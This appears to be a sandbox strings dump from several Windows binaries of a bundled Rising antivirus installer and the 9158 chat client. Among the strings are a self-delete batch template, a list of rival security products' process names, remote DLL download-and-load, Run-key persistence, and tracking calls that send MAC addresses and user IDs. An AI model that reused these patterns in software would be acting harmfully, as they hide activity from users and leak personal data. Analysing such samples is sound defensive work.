x}.eNk^6E@%X;g~gq%c^;.Aum_6}"%_^&36.hUS}i;%u$.dlsiY.Ub%cUNXEHJJGA[.OjS.lW".hw1..CB5t.MAF!|%X3j.aRSr".xNT3.Mh)X2.WqB%.GMK8&H8.VWa%s%s.dk:8e`C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RsdSfxTmp%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.text`.rdata@.data.rsrc@.relocQSVSSSh>%uPV|$D.tD.tgPVFTPjKFtPj;C.PjRVju.VV3|$$vL9|$ u%ShAdvapi32.dllExplorer.exeNtDll.dll%d %d %d %dFailed to call WTSQueryUserToken, err= 0x%xwtsapi32.DLLCould not open pipeSetNamedPipeHandleState failed\\.\pipe\RISING_RSD_BU%*.*f/RUNAS %sFailed to load psapi.dll.Psapi.dllSetup.exe End with ErrorCode: 0xXhXXp://center.rising.com.cn/LogCenter.asp?info=%sKey=%s&v1=%s&v2=%s&v3=%s&v4=%s&v5=%sPasswordPort%s\Data\%s\%s.inisetup.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s(%s)ReportViewKERNEL32.DLLSetWillReboot(%d)Failed to call QueryServiceStatus(RSD)! Err Code: %dFailed to call OpenService(RSD)! Err Code: %dFailed to call OpenSCManager! Err Code: %d\RsTest.iniÞSKTOP%\label.dat\Backup.ini\Export.ini\XMLS\RSSetup.xml\Setup.exe\*.exe\XMLS\Setup.xml\os.xml/PASS=/PRODUCT=%s/LANG=%dHKEY_LOCAL_MACHINE\SoftWare\Rising\%sITEM%dUPDATEXMLURL
d-d-- d:d
Setup.dll
Local_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
\Backup\RSD\RSSetup\RSSetup.xml
\RSSetup.xml
\CompsVer.inf
AddPCAExclude return: %d
Open Key Failed!
Create Key Failed!
Query Value Failed! Return: %d
%s\Setup.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
AddPCAExclude(%d)
Setup.xml
\Setup.xml
12345678.000
Create Temp Cfg From %s to %s
rd /q %s
rd /s /q %s
if exist %s goto repeat
del /s /q /f %s
\DelSelf.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SetFileSecurity() failed. Error %d
SetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorDacl() failed. Error %d
AddAce() failed. Error %d
GetAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
advapi32.dll
InitializeAcl() failed. Error %d
HeapAlloc() failed. Error %d
GetAclInformation() failed. Error %d
GetSecurityDescriptorDacl() failed. Error %d
InitializeSecurityDescriptor() failed.Error %d
GetFileSecurity() failed. Error %d
InitializeSid() failed. Error %d
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
WinSessionThread GetPidByName dwPID = %d , name=%s!
WTSQueryUserToken Failed! Err Code: %d
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
CreateProcess2 Return: %d
LoadLibrary Failed! Err Code: %d
CreateEnvironmentBlock Failed! Err Code: %d
DuplicateTokenEx Failed! Err Code: %d
CreateProcessWithTokenW Failed! Err Code: %d
Userenv.DLL
GetFileAttributes %s return: %d
Delete File %s fail, Err: %d
Wow64DisableWow64FsRedirection Return: %d
Wow64RevertWow64FsRedirection Return: %d
RsInstallService(%s) Return: %d
ChangeServiceConfig Failed! Err Code: %d
CreateService Failed! Err Code: %d
OpenSCManager Failed! Err Code: %d
RsInstallService(%s)
RsUninstallService(%s) Return: %d
DeleteService Failed! Err Code: %d
OpenService Failed And Service Already Exist! Err Code: %d
RsUninstallService(%s)
OpenService Failed! Err Code: %d
LoadLibrary(Advapi32.dll) Failed!
RsSetServiceFailureAction(%s) Return: %d
GetProcAddress(%s) Failed!
ChangeServiceConfig2 Failed! Err Code: %d
RsSetServiceFailureAction(%s)
QueryServiceStatus Failed! Err Code: %d
StartService Failed! Err Code: %d
RsStartService(%s)
Wait for Service %s Time Out!
QueryServiceStatus(%s) Failed! Err Code: %d
ControlService(%s) SERVICE_CONTROL_STOP Failed! Err Code: %d
HeapAlloc Failed! Err Code: %d
EnumDependentServices Failed! Err Code: %d
Stop Service %s Dependencies...
%s's Stop is Pending...
Service %s is Stopped...
OpenService(%s) Failed! Err Code: %d
RsStopService(%s)
Rs%sInstallCom(%s) Return: %d
LoadLibrary(%s) Failed!
%s Failed! ErrMsg: %s
Rs%sInstallCom(%s)...
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
WinSessionThread CreateProcess begin dwSessionID = %d!
WININIT.INI
\WININIT.INI
HKEY_CURRENT_CONFIG
"%s" %s
\RsMgrSvc.ini
Save DELETEPATH %s to RsMgrSvc.ini
Save REBOOTRUN %s to RsMgrSvc.ini
%s Loaded By %s
EXPLORER.EXE
Setup.exe Begin----------------------------------
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
StopComponent(%s)...
StartComponent(%s)...
Report Error!
Call Component %s Dll_PreHandle Return: 0xX
Call Component %s Dll_PostHandle Return: 0xX
Check XML File %s Failed
Check File %s Failed
BackUp XML File From: %s To %s
Delete XML File: %s
Copy XML File From: %s To %s
%s\RsMgrsvc.ini
URLInfoAbout
hXXp://help.ikaka.com/
"%s" /UNINSTALL /PRODUCT=%s
"%s" /UNINSTALL /PRODUCT=RSD
Delete File %s
Copy File From %s To %s
CompsVer.inf
Copy Path From %s To %s
Down Load %s To Path: %s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run
RunFirstInstall Successfully...NeedReboot: %d
InstallComponentList Failed! Error Code: 0xX
PreHandleComponentList Failed! Error Code: 0xX
Product_PreHandle Failed! Error Code: 0xX
BackUpComponentList Failed! Error Code: 0xX
CheckComponentList Failed! Error Code: 0xX
RunFirstInstall, AfterReboot: %d
RavTmp: %s
file not exist : %s
succeed to download %s
Failed to download %s. ErrCode = %d; hr = %d
Failed to verify %s
%s%s/%s%s.inf
Failed to get download url from %s
URLLIST
Failed to load %s.
%s%s/%s/%s/%s
%s\%s\%s\%s
%s%s/%s/%s
%s\%s\%s
Failed to get %s-ITEM.
Failed to get %s-FILES.
Failed to get %s-COMPONENT.
Download %s retry > 3
%s/%s/%s_xml.zip
%s\%s\%s.xml
%s%s/%s/%s.xml
Failed to get %s' newver from %s
SCMD
REGVERKEY
REGKEYVALUE
REGKEYNAME
REGKEY
Set File %s Everyone Access Rights 0xX return: %d
Set File %s Users Access Rights 0xX return: %d
Delete File Return: %d, NeedReboot: %d
Prepare To Delete File %s...
Back Up File From: %s To: %s Return: %d
Skip Backing Up File %s For Checked OK...
Copy File Return: %d, NeedReboot: %d
MoveFile From %s To %s
Prepare To Copy File From %s To %s...
TaskbarPin = 0x%x
Install Link: %s
Delete Link: %s
TaskbarunPin = 0x%x
Old Link File: %s
SUBKEY
Set Key %s Everyone Access Rights 0xX return: %d
Set Key %s Users Access Rights 0xX return: %d
REGKEYDATATYPE
Install Key KeyName: %s, ValueName: %s, Value: %s, DataType: %d Return: %d
Backup Key Value Return: %d
microsoft\windows\currentversion\run
Restore Key Value Return: %d
UnInstall Key KeyName: %s, ValueName: %s Return: %d
Execute langsel.exe
langsel.exe
Setup Log (*.log)
*.log
A%d M
ÚTADIR%
Need Reboot, Add DeletePath Task To Server: %s
No Reboot, RsDeletePath(%s)
\lics%d.txt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
{X-X-X-XX-XXXXXX}.bmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SHFolder.dll
Shell32.dll
HKEY_LOCAL_MACHINE\%s\%s
%snserver.exe
%sRsTest.ini
Software\Microsoft\Windows\CurrentVersion
nserver.exe
%FIRSTPART%
%COMMONDIR%
%DOMINODATA%
%DOMINODIR%
%SYSDIR64%
%SYSDIR%
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
[INF]CRsConfigBase::InitializeRsConfig: GetPath(PathSize=%d),Result=0xX
[ERR]CRsConfigBase::InitializeRsConfig: QueryInterface RSIID_IRSCfgMgr Failed(Result=0xX)!
[ERR]CRsConfigBase::InitializeRsConfig:CreateAppEnv Failed(Result=0xX).
RsConfig.cfg
[ERR]CRsConfigBase::InitializeRsConfig:QueryInterface RSIID_IRSAppMgr failed(Result=0xX).
[ERR]CRsConfigBase::InitializeRsConfig:CreateObject RSID_RSAppMgr failed(Result=0xX).
RSAPPMGR.DLL
\RSAPPMGR.DLL
comx3.dll
%s>
standalone="%s"
encoding="%s"
version="%s"
X;
%s='%s'
%s="%s"
\RsLang.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
System\CurrentControlSet\Services\VxD\MSTCP
255.255.255.255
socket() failed; %d
Range: bytes=%d-
hXXp://
portuguese-brazilian
.rstmp
1.1.3
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
C:\DistributedAutoLink\Temp\CompileOutputDir\Setup.pdb
GetProcessHeap
SetNamedPipeHandleState
WaitNamedPipeA
GetWindowsDirectoryA
KERNEL32.dll
MsgWaitForMultipleObjects
ExitWindowsEx
EnumWindows
EnumChildWindows
USER32.dll
comdlg32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyA
RegOpenKeyA
RegCreateKeyExA
RegDeleteKeyA
RegSetKeySecurity
RegGetKeySecurity
RegQueryInfoKeyA
RegEnumKeyExA
ADVAPI32.dll
ShellExecuteExA
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
WININET.dll
VERSION.dll
WSOCK32.dll
GetCPInfo
11166666600000000000000/////////.....""""""""""""""""--- .DDDDDDDDDDDDDDDDDDDDDDDDDDBBBBBB
>VVVVVVVVVVVVYYYY:Y:YYV8888888888888.ppMs3llkxNqKKqK
!'!555''''
!! **""!
#### # # # # # # # #
6,,,6,,6,66
,,,,66,,6,
6,,,,6,,,
555555555555555
666666666666666666
888888888
CC.CCCCCC6hML7L77L789;nOOOOOOOO8
...CCCCCC6hMLL7777789;
...CCCCCC6hML77777789;
"""!"!"!"
1111111111111000000
!%%&11&&&
23333333333333333333
3333343333333333334
443434333333333333
#34344443344333343
3444444444444
444444444444
7676676676676676
7777777777777
77777777777
>889889889889883$3
/2$ÝDD
4::-...,..,,,, %
7766666666666666666666601$ÞDE
000000000000011110
"#%DPTVVVVVVPO%%"L
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
6'6.6>6>729#939:9[9; ;$;(;,;0;4;8;/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0DhXXp://ocsp.verisign.com0;/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0)rackUrl3&It is strongly recommended to close all Windows program before running the setup program.Password:This module need %fM1.0.0.2Setup.EXE20140619153336140ECan't create the destination folder, please check and input it again.APlease take off your CD avoiding to restart from CDROM next time.Totally scaned %d files, found %d viruses.Export,Unable to Create File Folder: %s , continue?This version [version:%s] is older than your current installed [version:%s]Continue to install Rising AntiVirus Software[version:%s]?%Click "Next" to continue installationjSystem comctl32.dll version is lower than 4.70!\please upgrade it through installing IE4 or above version.KYou have install follow Rising product, this product can't install whit it.FLast Rising setup progress is not completed, please reboot your systemNRising Anti-virus software has been uninstalled successfully but follow files.!Version: %s Update Date: %s$Add or remove same component please!(%d second left to auto close this dialog8Rising Anti-virus software has been updated successfullyPassword is error7update is completed, windows need reboot for copy file.RsMgrSvc.exe_1936:.text`.rdata@.data.rsrct%ShH;B|$D.tDCryptDecodeObject failed with %xwintrust.dllWTHelperGetProvCertFromChainCryptCATCatalogInfoFromContextcrypt32.dllCryptMsgGetParamCryptSIPVerifyIndirectData failed with %x1.3.6.1.4.1.311.2.1.4CryptMsgGetParam(%d) failed with %xCryptSIPRetrieveSubjectGuid failed with %xCryptQueryObject failed with %x\\.\PhysicalDrive%d\\.\Scsi%d:Iphlpapi.dllSoftware\Microsoft\Windows\CurrentVersionAdvapi32.dll\Rising\RSD\RsMgrSvc.exe"Explorer.exe
XXXXXXXXXXX
{X-X-X-XX-XXXXXX}
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
[d-d-d][d:d:d:d]
SHFolder.dll
Shell32.dll
SOFTWARE\Rising\%s
2.log
[u]
[0xX]
RAV.INI
WinSessionThread GetPidByName dwPID = %d , name=%s!
NtDll.dll
Kernel32.dll
WTSQueryUserToken Failed! Err Code: %d
wtsapi32.DLL
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
>`userinit.exe
CRsMgrSvc::WaitForLogonNT:LoadLibrary(_"psapi.dll");err=0x%x
psapi.dll
Fail to OpenProcessToken; 0x%x
Failed to call CreateProcessAsUser again: appname = %s cmd=%s;err=0x%x.
Failed to SetTokenInformation(0):err=0x%x
Failed to call CreateProcessAsUser:cmd=%s;err=0x%x.
Failed to DuplicateTokenEx:err=0x%x
Failed to SetTokenInformation:err=0x%x
SessionId = %d
Failed to LoadLibrary("Wtsapi32.dll"):err=0x
Failed to call WTSEnumerateSessions:err=0x%x
SessionInfo[%d]: SessionId=%d; WinStationName=%s; State=%d.
Wtsapi32.dll
Failed to CreateProcess:%s;err=0x%x
Failed to LoadLibrary("Wtsapi32.dll"):err=0x%x
Failed to WTSEnumerateSessions:err=0x%x
Session\%d\RSD_POP_MESSAGE_INFO
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
Userenv.DLL
WinSessionThread CreateProcess begin dwSessionID = %d!
Failed to LoadLibrary("Userenv.DLL"):err=0x%x
Failed to call CreateProcessAsUser: cmd=%s;err=0x%x.
New Failed to call WTSQueryUserToken, err= 0x%x
rsmsg
%s\rsmsginfo.ini
Failed to open the shell ready event: 0x%x
"%s" /shellrun
%s\RsStub.exe
Session\%d\ShellReadyEvent
LogonRun - session : %d
Failed to call RegOpenKeyEx, err = 0x%x
Failed to call RegSaveKey, err = 0x%x
Failed to call AdjustTokenPrivileges, err = 0x%x
Failed to call OpenPrcessToken, err = 0x%x
%s\RsMgrSvc.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
BaiduAnSvc.exe
BaiduSdSvc.exe
liebao.exe
ksafe.exe
{849B7E2B-0551-429C-B317-14B7D374D6EC}_is1
kxescore.exe
QQPCRtp.exe
360sd.exe
360se.exe
{23F3F476-BE34-4f48-9C77-2806A8393EC4}
360Desktop.exe
ZhuDongFangYu.exe
safeboxTray.exe
Failed to Create LogonRunThread Thread, err = 0x%x
SessionChange:EventType=%d; sessionID = %d
\Backup\RSD\RSSetup\RSSetup.xml
rsup10.rising.com.cn
u.suxiazai.com
%s?t=0&info=%s
ver=%s&guid=%s&sguid=%s&state=%s
hXXp://u.suxiazai.com/menu/info.xml
hXXp://rsup10.rising.com.cn/menu/info.xml
%srsd\info.xml
/subkey
Failed to Verify the "%s".
Failed to call vf.Init.
%s\rsbackup.exe
"%s\rsbackup.exe"
/subkey
%s\RsMgrSvc.ini
%s\updater.exe
"%s\updater.exe"
DeleteFile: %s.
ITEM%d
\RsMgrSvc.ini
DeletePath: %s.
Clean WillReboot In %s
%s\%s\%s.ini
1971-01-01 00:00:00
%d-%d-%d %d:%d:%d
%s\Data
%s /subkey %s /RsMgrSvc
"%s\Updater.exe" /silence
%s\Updater.exe
\Reboot.ini
CRsMgrSvc::SVC:Failed to CreateEvent-Wait: err=0x%x
CRsMgrSvc::SVC:Failed to CreateEvent, err=0x%x
comx3.dll
KERNEL32.DLL
kernel32.dll
MSIE %d.%d
WININET.DLL
Windows
Windows Me
Windows 98
Windows 95
Windows NT %d.%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
HTTP/1.0
Range: bytes=%d-
RstoreDll.dll
@CRsUseRepairProduct::prstorestart %s Dllpath:%s
@CRsUseRepairProduct::prstorestart %s
Subkey: %s could not find dllPath ,so use rsd path:%s
Subkey: %s Path:%s
\RstoreDll.dll
02%d.d.d.d
CRsLoadCloud::DownLoadCldRsdDll... faild hre = %d ,lasterror = %d
CRsLoadCloud::LoadCldRsdDll... failed lasterror = %d
CRsLoadCloud::LoadCldRsdDll...%s
CRsLoadCloud::StartTask...success
CRsLoadCloud::InitData... CopyFile flag= %d.
hXXp://download.suxiazai.com/for_down/2013/new/dlls/CldRsd.dll
CldRsd.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
GetProcessWindowStation
user32.dll
C:\DistributedAutoLink\Temp\CompileOutputDir\RsMgrSvc.pdb
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExA
RegEnumKeyExA
RegCreateKeyA
RegOpenKeyA
RegSaveKeyA
RegQueryInfoKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
CryptMsgClose
CertCloseStore
CertGetNameStringW
CertFindCertificateInStore
CRYPT32.dll
RPCRT4.dll
InternetCrackUrlA
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
WININET.dll
VERSION.dll
GetProcessHeap
GetCPInfo
zcÁ
%Program Files%\Rising\RSD\RsMgrSvc.exe.log
%Program Files%\Rising\RSD\RsMgrSvc.exe
.Beijing Rising Information Technology Corporation Limited
1.0.0.50
RsMgrSvc.exe
20150423153938597install1393485.exe_1148_rwx_10072000_00001000:
SetWillReboot(%d)
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
\RsTest.ini
ÞSKTOP%
\label.dat
\Backup.ini
\Export.ini
\XMLS\RSSetup.xml
\Setup.exe
\*.exe
\XMLS\Setup.xml
\os.xml
Label.dat
/PASS=
/PRODUCT=%s
/LANG=%d
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
ITEM%d
UPDATEXMLURL
d-d-- d:d
Setup.dll
Local_RSD_Setup_%s
Global\Rising_RSD_Setup_%s
Rising_RSD_Setup_%s
\Backup\RSD\RSSetup\RSSetup.xml
\RSSetup.xml
\CompsVer.inf
AddPCAExclude return: %d
Open Key Failed!
Create Key Failed!
Query Value Failed! Return: %d
%s\Setup.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
AddPCAExclude(%d)
Setup.xml
\Setup.xml
12345678.000
Create Temp Cfg From %s to %s
rd /q %s
rd /s /q %s
if exist %s goto repeat
del /s /q /f %s
\DelSelf.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SetFileSecurity() failed. Error %d
SetSecurityDescriptorControl() failed.Error %d
GetSecurityDescriptorControl() failed.Error %d
SetSecurityDescriptorDacl() failed. Error %d
AddAce() failed. Error %d
GetAce() failed. Error %d
AddAccessAllowedAce() failed. Error %d
AddAccessAllowedAceEx() failed. Error %d
advapi32.dll
InitializeAcl() failed. Error %d
HeapAlloc() failed. Error %d
GetAclInformation() failed. Error %dpopwndexe.exe_760:
.text
`.rdata
@.data
.rsrc
@.reloc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
C:\DistributedAutoLink\Temp\CompileOutputDir\popwndexe.pdb
KERNEL32.dll
ole32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
>$>(>,>0>
5(565;5~7
mscoree.dll
KERNEL32.DLL
rsdk.dll
BUF:{E59BC62D-64AB-439D-BAF3-B2D1BA15E441}{4F496E7F-D8FD-4DED-967D-C4F53BFB9452}{216DFF2F-B2F0-4CE0-BA5B-72E0B7BFAC28}{C8CA7580-8E65-49E6-A66A-B087C7EF523D}{5D37C04C-8F58-4D47-94C8-B94153399473}{ED20E0E5-2357-4825-B3FA-198AEC674E81}{AD4F3A47-0CD6-43DE-BC22-E8BE24FFD424}{2100E98D-B13E-4306-8081-50F325B10586}{0AEF80FB-9BAF-4E66-96B3-784ED0FCECF1}{E8D494C-D598-4E2F-B796-809E74315E76}{95EAB9C4-A7F4-46A8-A69F-54911364F2F0}{EBC23555-424F-45C3-BECE-206819CB276B}{4FCE6281-8849-4FC6-A764-95C793EB8A48}{FCA0E62A-5DD4-46FB-AFB2-BDC74EA7DB36}{35FD921E-B758-46D8-B0AA-FCD033B0E66D}{201409F6-22F8-48D3-A69F-7935BDDE6BFA}{787683B8-D58D-4072-BA04-46284CEA5AF8}{224E5B34-E98F-4033-8B6F-46B758E7587E}{23BD3E3A-72ED-4AE4-A5A9-41B466BA8D25}{B769D42A-2392-42B6-8C10-DB99AE23F75A}{1DDF6C09-67B3-4b05-B3A4-43D7D92D067C}{56CF1F5A-D59E-4fe7-BE35-066F4E788E2A}
{{887FE1BB-7C1F-4d73-BD44-B726E1672DC7}}_%s
%Program Files%\Rising\RSD\popwndexe.exe
1.0.0.7
tray.exe
8142105922100009158.exe_3012:
.text
`.rdata
@.data
.rsrc
SSh0'
@ SSh`
N SShy
j.hH8S
O SSh
W SSh
H SSh
@ SShU
SSSSSSSh
F SSh
(3-!0,1'8"5.*2$unzip 0.18 Copyright 1998-2002 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll1.1.4inflate 1.1.4 Copyright 1995-2002 Mark AdlerHttpQueryInfoAInternetOpenUrlAWININET.dll?IsControlHaveSkin@CAppSysOperation@@UAEHXZ?CleanBitmapMem@CAppSysOperation@@UAEHXZ?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@PAVCBitmap@@@Z?LoadBitmapFileToMem@CAppSysOperation@@UAEHPAUHINSTANCE__@@VCString@@@Z?InitializeOperation@CAppSysOperation@@UAEXPAVCWnd@@@Z?CleanSkin@CAppSysOperation@@UAEHPAX@Z?DrawContent@CAppSysOperation@@UAEHPAVCDC@@VCString@@AAVCRect@@H@Z?AdjustPosition@CAppSysOperation@@UAEHHHHH@Z?AdjustPosition@CAppSysOperation@@UAEHUtagRECT@@@Z?DrawSkin@CAppSysOperation@@UAEHPAUtagDRAWITEMSTRUCT@@@Z?PaintBackGround@CAppSysOperation@@UAEHPAVCDC@@@Z?CleanUp@CAppSysOperation@@UAEXXZ?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@PAVCBitmap@@@Z?AttachBitmapHadle@CAppSysOperation@@UAEXPAUHBITMAP__@@@Z?PreTranslateMessage@CUIButtonTemplate@@MAEHPAUtagMSG@@@Z?messageMap@CUIButtonTemplate@@1UAFX_MSGMAP@@B?GetCurrentSkin@CAppSysOperation@@UAEHPAX@Z?LoadSkin@CAppSysOperation@@UAEHPAX@Z?FitBitmapSize@CAppSysOperation@@UAEXXZ?messageMap@CUIDlgTemplate@@1UAFX_MSGMAP@@B?GetBitmapHeight@CAppSysOperation@@QAEHXZ?GetBitmapWidth@CAppSysOperation@@QAEHXZ?messageMap@CCustomDlg@@1UAFX_MSGMAP@@B?LoadSkinToBitmap@CAppSysOperation@@SA_NAAVCBitmap@@PAXAA_N@Z?SetSkinPath@CAppSysOperation@@SAXVCString@@@Z?GetPictureExEx@CSkinConfContext@@QAEPAXPBDH@Z?GetMessageMap@CUIListCtrlEx@@MBEPBUAFX_MSGMAP@@XZMVUILib.dllMSIMG32.dllMFC42.DLLMSVCRT.dll_acmdlnWinExecGetCPInfoGetWindowsDirectoryAKERNEL32.dllUSER32.dllGDI32.dllRegCloseKeyRegOpenKeyExARegCreateKeyExAADVAPI32.dllShellExecuteASHELL32.dllCOMCTL32.dllole32.dllOLEPRO32.DLLOLEAUT32.dllWSOCK32.dllMSVCP60.dllGdiplusShutdowngdiplus.dllpublictool.dllIdleTrac.dllNETAPI32.dllSHLWAPI.dllWINMM.dllpdh.dll9158.exe?GetPassword@CRoomInfo@@QAE?AVCString@@XZ?GetPort@CRoomInfo@@QAEHXZ?SetPassword@CRoomInfo@@QAEXPBD@Z?SetPort@CRoomInfo@@QAEXH@ZItemList/Item[ItemName = '%s']/ItemTextItemList/Item[ItemID = %d]/ItemTextIDispatch error #%dFSkinRes\HollSplitter.bmpSkinRes\VIPRoomSkin\row.bmp%s\%s%s9158.exechatQK.xmlSkinRes\unlock.bmpdance_room/dance_coffer.aspxuseridx=%s&userpass=%s&type=1doid=%d&fromid=%d&stepid=%d%s?url=%sm_lpNormal->CopyHoleDC(%d, 0, %d, %d)m_lpActive->CopyHoleDC(0, 0, %d, %d)%e rcRect(%d,%d,%d,%d)CBmpProgCtrl..........................................%f*%d = %d//player.iniSkinRes\BroadCastBtn.bmpSkinRes\Broadcastclose.bmpOnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"OnDocumentComplete: URL="%s"OnProgressChange: progress=%d, progress_max=%dOnNavigationComplete2: URL="%s"OnStatusTextChange: text="%s"OnTitleChange: text="%s"\SkinRes\fragment.bmpactive.ini.PAVCInternetException@@itemboxconfig.xmlfaceconfig.xmlitemconfig.xml\Fruit\fruit.xmlBanner.xmlcar.xml\allplat.xml%s,%ld,%d,%d,%d,%d,%sDownLoad.exe\SkinRes\waring.bmphXXp://img8.9158.com/200808/09/00/25/200808091735989s.jpg%s(%d)User32.DLLSkinRes/DriftingHorn.png%s&userid=%s&type=%d\tui_AD.ini\logincount.iniToOpenUrl2GotoWebUrl2UserLoginToOpenUrlGotoWebUrlOnWebMessageBoxMsgEnterRoomAppOpenUrlLoginErrorRoomPassAdUser//weibo.inidiv.img50 img { max-width:60px; max-height:60px;yqh:expression((this.offsetWidth > this.offsetHeight)?(this.style.width = this.offsetWidth >= 60 ? "60px" : "auto"):(this.style.height = this.offsetHeight >= 60 ? "60px" : "auto"));SkinRes\spinbtn_leftright.bmpSkinRes\flashTab.bmpSkinRes\flashTabDown.bmp%d/%dSkinRes\MoneyTip.bmp%Y-%m-%d %H:%M:%S %W-%A%s\*.*DynamicEffects\LightSticks.dbDynamicEffects\CaiShenImages.dbDynamicEffects\FireworksImages.db\DynamicEffects.zipDynamicEffects\DynamicEffects.zip\\.\PhysicalDrive%d\\.\Scsi%d:
XXXXXX
X-
Iphlpapi.dll
cugame.9158.com
active/salebag/getinfo.aspx
SkinRes\btn_giftHorn.bmp
SkinRes/bg_giftHorn.png
CityWide_Step1.sysclose
CareFor(t58)_Step1.dancebtn
CareFor(9158)_Step1.freebtn
CareFor(9158)_Step1.makefriendbtn
CareFor(9158)_Step1.songbtn
CareFor(t58)_Step1.freebtn
CareFor(t58)_Step1.makefriendbtn
Favorite_Step1.select_storebtn
.nevernoticebtn
.receive
LoginReceive_
.iknow
.reg_account
QQLogin_
.songbtn
.dancebtn
.freebtn
.makefriendbtn
.sysclose
.closebtn
.select_unstorebtn
.select_storebtn
Guide_%d
\guidestate.ini
WizardDll.dll
public.dll
hXXp://tj.9158.com/qinqinlog.aspx?%s
Lmarkid=%s&Wmarkid=%s&mac=%s&Qinqinumber=%d&useridx=%s&flagmd5=%s
%s%stest0313
%Y-%m-%d
tui.ini
room_regsum.aspx
useridx=%s&nTime=%d&nType=%s
%d$^&&***WEWEE%s
HallClose.ini
broadHistory.txt
SOFTWARE\9158web\%s
skinres\99Lover.xml
ProxyID.ini
promo/promo_installnum_insert.aspx
ip=%s&nType=%s&mac=%s&promoinfo=%s&content=%s
promo/promo_guestnum_insert.aspx
ip=%s&nType=%s&mac=%s&uidx=%s&time=%d&promoinfo=%s&content=%s
&&**WEWEE%s
%sOnlineUpdate.exe %d
UserInfo.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ImageOle.dll
login9158.dll
Invoker9158.dll
userinfo.txt
%s
%d%s%s%s
ip=%s&nType=%s&insert=%s&time=%d
EnterRoomURL
9158:{"uidx":%s,"uid":"%s","usex":%s,"viplevel":%d}^|$|^%s
6,%s,%s,0,0
6,%s,%s,%s,%s,%s,%s,%s
LobbyClient.dll
IMClient.dll
DynamicEffects.dll
skinres\skin.ini
//HallClose.ini
skinres\Hall\Signal.bmp
skinres\Hall\currentver.bmp
skinres\Hall\SearchRoomBottomRight.bmp
skinres\Hall\SearchRoomBottomLeft.bmp
skinres\Hall\mainietopright.bmp
skinres\Hall\mainietopLeft.bmp
\SkinRes\HallToolbar.bmp
VideoHelper.dll
SOFTWARE\9158web
AudioPort
Port
%s\%d
%s(%s)
Content-Type: application/x-www-form-urlencoded
url=%s
hXXp://room.9158.com/userroom_get.aspx?roomid=%d&useridx=%s
MainUrl->LeaveRoom_Step1.MainUrl=>Url:hXXp://room.9158.com/ktv_new/ktv_tuiinfo.aspx?roomid=%d&&
idx=%s&u_name=%s&c_name=%s
tiaoshi: %s===>%s
hXXp://room.9158.com/apps/webloginapi.aspx
?type=%d
hXXp://VVV.9158.com
hXXp://room.9158.com
&time=%s&viewpa=1
&time=%s&viewpa=2
%d%d%d%d%d%d
hXXp://cugame.9158.com/active/salebag/getinfo.aspx?id=%s&pwd=%s
